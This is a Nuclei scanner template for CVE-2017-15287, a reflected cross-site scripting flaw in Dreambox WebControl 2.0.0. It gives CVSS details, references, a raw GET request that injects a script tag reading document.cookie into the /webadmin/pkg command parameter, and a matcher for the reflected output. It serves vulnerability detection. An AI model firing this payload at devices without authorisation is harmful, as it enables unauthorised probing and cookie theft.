nuclei-templates/cves/2017/CVE-2017-15287.yaml

33 lines
1.0 KiB
YAML

id: CVE-2017-15287
info:
name: Dreambox WebControl 2.0.0 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: |
Dream Multimedia Dreambox devices via their WebControl component are vulnerable to reflected cross-site scripting, as demonstrated by the "Name des Bouquets" field, or the file parameter to the /file URI.
reference:
- https://fireshellsecurity.team/assets/pdf/Vulnerability-XSS-Dreambox.pdf
- https://www.exploit-db.com/exploits/42986/
- https://nvd.nist.gov/vuln/detail/CVE-2017-15287
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-15287
cwe-id: CWE-79
tags: dreambox,edb,cve,cve2017,xss
requests:
- raw:
- |
GET /webadmin/pkg?command=<script>alert(document.cookie)</script> HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers:
- type: word
words:
- 'Unknown command: <script>alert(document.cookie)</script>'
# Enhanced by mp on 2022/04/26